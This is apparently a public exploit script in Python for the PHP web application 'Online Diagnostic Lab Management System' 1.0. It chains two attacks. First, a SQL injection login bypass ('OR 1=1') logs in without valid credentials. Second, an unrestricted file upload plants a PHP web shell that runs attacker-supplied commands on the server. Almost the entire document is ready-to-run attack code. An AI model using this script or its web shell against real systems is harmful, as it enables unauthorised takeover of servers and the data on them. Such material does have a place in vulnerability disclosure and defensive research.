# Exploit Title: Online Diagnostic Lab Management System - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: N/A
# Date: 2022-9-23
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0
# Authentication Required: bypass login with sql injection 

#/usr/bin/python3 

import requests 
import os
import sys
import time
import random

# clean screen
os.system("cls")
os.system("clear")

logo = '''
##################################################################
#                                                                #  
#    Exploit Script ( Online Diagnostic Lab Management System )  #
#                                                                #
##################################################################
'''
print(logo)

url = str(input("Enter website url : "))
username = ("' OR 1=1-- -")
password = ("test")

req = requests.Session()

target = url+"/diagnostic/login.php"
data = {'username':username,'password':password}

website = req.post(target,data=data)
files = open("rev.php","w")
payload = "<?php system($_GET['cmd']);?>"
files.write(payload)
files.close()

hash = random.getrandbits(128)
name_file = str(hash)+".php"
if "Login Successfully" in website.text:
    
    print("[+] Login Successfully")
    website_1 = url+"/diagnostic/php_action/createOrder.php"

    upload_file = { 
        "orderDate": (None,""),
        "clientName": (None,""),
        "clientContact" : (None,""),
        "productName[]" : (None,""),
        "rateValue[]" : (None,""),
        "quantity[]" : (None,""),
        "totalValue[]" : (None,""),
        "subTotalValue" : (None,""),
        "totalAmountValue" : (None,""),
        "discount" : (None,""),
        "grandTotalValue" : (None,""),
        "gstn" : (None,""),
        "vatValue" : (None,""),
        "paid" : (None,""),
        "dueValue" : (None,""),
        "paymentType" : (None,""),
        "paymentStatus" : (None,""),
        "paymentPlace" : (None,""),
        "productImage" : (name_file,open("rev.php","rb"))
        } 

    up = req.post(website_1,files=upload_file)
    print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)
    print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")
else: 
    print("[-] Check username or password")